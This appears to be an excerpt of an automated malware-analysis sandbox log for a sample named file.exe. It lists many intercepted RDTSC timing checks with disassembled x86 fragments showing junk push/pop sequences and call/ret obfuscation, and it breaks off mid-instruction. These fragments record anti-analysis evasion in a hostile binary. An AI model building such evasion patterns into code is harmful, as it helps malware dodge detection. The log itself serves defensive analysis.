                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5136E7 second address: 5136EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5136EF second address: 513714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5B4D24B727h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513714 second address: 513739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D97h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5B4C774D92h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513739 second address: 513754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5B4D24B716h 0x0000000a jc 00007F5B4D24B71Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 jne 00007F5B4D24B716h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516A3E second address: 516A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516A42 second address: 516A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516BB6 second address: 516BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516BBC second address: 516BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516BC0 second address: 516C13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2A2Bh] 0x00000015 jmp 00007F5B4C774D8Eh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F5B4C774D88h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov edi, 37FB520Bh 0x0000003b push 95115414h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 pop edi 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516C13 second address: 516C1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516DB9 second address: 516E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 5A4D1594h 0x0000000d mov esi, dword ptr [ebp+122D2A0Bh] 0x00000013 push 00000003h 0x00000015 movsx edi, cx 0x00000018 push 00000000h 0x0000001a jmp 00007F5B4C774D93h 0x0000001f push 00000003h 0x00000021 call 00007F5B4C774D99h 0x00000026 and esi, 4B08D850h 0x0000002c pop esi 0x0000002d push 87CEA282h 0x00000032 pushad 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516E11 second address: 516E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b popad 0x0000000c add dword ptr [esp], 38315D7Eh 0x00000013 lea ebx, dword ptr [ebp+12458926h] 0x00000019 mov edi, dword ptr [ebp+122D3303h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007F5B4D24B71Ch 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516E3F second address: 516E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4C774D93h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350C9 second address: 5350F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F5B4D24B716h 0x0000000c jmp 00007F5B4D24B71Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F5B4D24B716h 0x0000001a jmp 00007F5B4D24B71Dh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350F6 second address: 535121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F5B4C774DABh 0x0000000d jmp 00007F5B4C774D8Dh 0x00000012 pushad 0x00000013 jmp 00007F5B4C774D8Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A7A second address: 535A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F5B4D24B720h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A96 second address: 535AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5B4C774D91h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535AB9 second address: 535ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D9A second address: 535D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D9E second address: 535DAE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535DAE second address: 535DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535F17 second address: 535F2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CC second address: 5360D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536219 second address: 53621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53621F second address: 53624B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F5B4C774D8Fh 0x00000016 popad 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F5B4C774D86h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53624B second address: 536266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536266 second address: 53627A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5B4C774D86h 0x0000000a jmp 00007F5B4C774D8Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53627A second address: 53627E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2A6 second address: 52C2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2B2 second address: 52C2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2B6 second address: 52C2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2BA second address: 52C2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F5B4D24B71Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2D6 second address: 52C2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5B4C774D99h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536A4D second address: 536A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536B9F second address: 536BC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5B4C774D95h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F5B4C774D86h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0DC second address: 53B0E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B6CB second address: 53B6CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E7A8 second address: 53E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5B4D24B726h 0x0000000b jmp 00007F5B4D24B71Ah 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501244 second address: 50125D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007F5B4C774D86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5424B7 second address: 5424C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5B4D24B716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5424C3 second address: 5424CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5424CC second address: 5424F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5B4D24B716h 0x00000009 ja 00007F5B4D24B716h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 jmp 00007F5B4D24B724h 0x0000001c pop edi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F896D second address: 4F8971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545C15 second address: 545C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5B4D24B722h 0x0000000b jmp 00007F5B4D24B71Fh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546079 second address: 546086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546086 second address: 54608C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54608C second address: 546095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546095 second address: 546099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546099 second address: 5460A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54634A second address: 546350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546507 second address: 54650B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54666D second address: 546671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546671 second address: 546677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546677 second address: 5466C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 jmp 00007F5B4D24B71Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jbe 00007F5B4D24B71Ah 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F5B4D24B71Fh 0x0000001d jo 00007F5B4D24B735h 0x00000023 jmp 00007F5B4D24B729h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470CD second address: 5470D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CFE second address: 547D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], ebx 0x0000000a jmp 00007F5B4D24B720h 0x0000000f nop 0x00000010 pushad 0x00000011 jmp 00007F5B4D24B721h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D2E second address: 547D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5B4C774D86h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jbe 00007F5B4C774D98h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F5B4C774D86h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D49 second address: 547D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54805E second address: 548064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54828E second address: 548293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5487D1 second address: 5487D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A32C second address: 54A342 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5B4D24B718h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F5B4D24B716h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A342 second address: 54A346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A346 second address: 54A34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C3E0 second address: 54C3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ABCD second address: 54ABD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D7A1 second address: 54D7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ABD1 second address: 54ABDB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E315 second address: 54E329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4C774D90h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556AE9 second address: 556AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554AC8 second address: 554B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5B4C774D88h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov dword ptr [ebp+12456F46h], edx 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F5B4C774D88h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 adc bh, FFFFFFE4h 0x00000055 mov eax, dword ptr [ebp+122D0575h] 0x0000005b mov ebx, ecx 0x0000005d push FFFFFFFFh 0x0000005f mov edi, dword ptr [ebp+122D17C2h] 0x00000065 push eax 0x00000066 pushad 0x00000067 push edi 0x00000068 je 00007F5B4C774D86h 0x0000006e pop edi 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555C57 second address: 555C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B5E second address: 557B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556C8D second address: 556C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B63 second address: 557BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5B4C774D86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5B4C774D88h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 pushad 0x00000029 jmp 00007F5B4C774D97h 0x0000002e mov di, 7111h 0x00000032 popad 0x00000033 movzx edi, si 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F5B4C774D88h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 push 00000000h 0x00000054 jnl 00007F5B4C774D92h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556C91 second address: 556CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557BEE second address: 557C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D90h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557C03 second address: 557C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5B4D24B716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556D54 second address: 556D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557DD5 second address: 557DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558DAF second address: 558E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F5B4C774D86h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+122D17BBh], eax 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F5B4C774D88h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 call 00007F5B4C774D93h 0x00000048 sbb ebx, 399C7030h 0x0000004e pop edi 0x0000004f mov eax, dword ptr [ebp+122D0CF1h] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a call 00007F5B4C774D88h 0x0000005f pop eax 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 add dword ptr [esp+04h], 00000014h 0x0000006c inc eax 0x0000006d push eax 0x0000006e ret 0x0000006f pop eax 0x00000070 ret 0x00000071 mov ebx, dword ptr [ebp+122D28F3h] 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jl 00007F5B4C774D8Ch 0x00000080 je 00007F5B4C774D86h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559B99 second address: 559B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AA8B second address: 55AB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b jno 00007F5B4C774D8Ch 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F5B4C774D88h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d add dword ptr [ebp+1246972Ah], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F5B4C774D88h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f jmp 00007F5B4C774D97h 0x00000054 mov 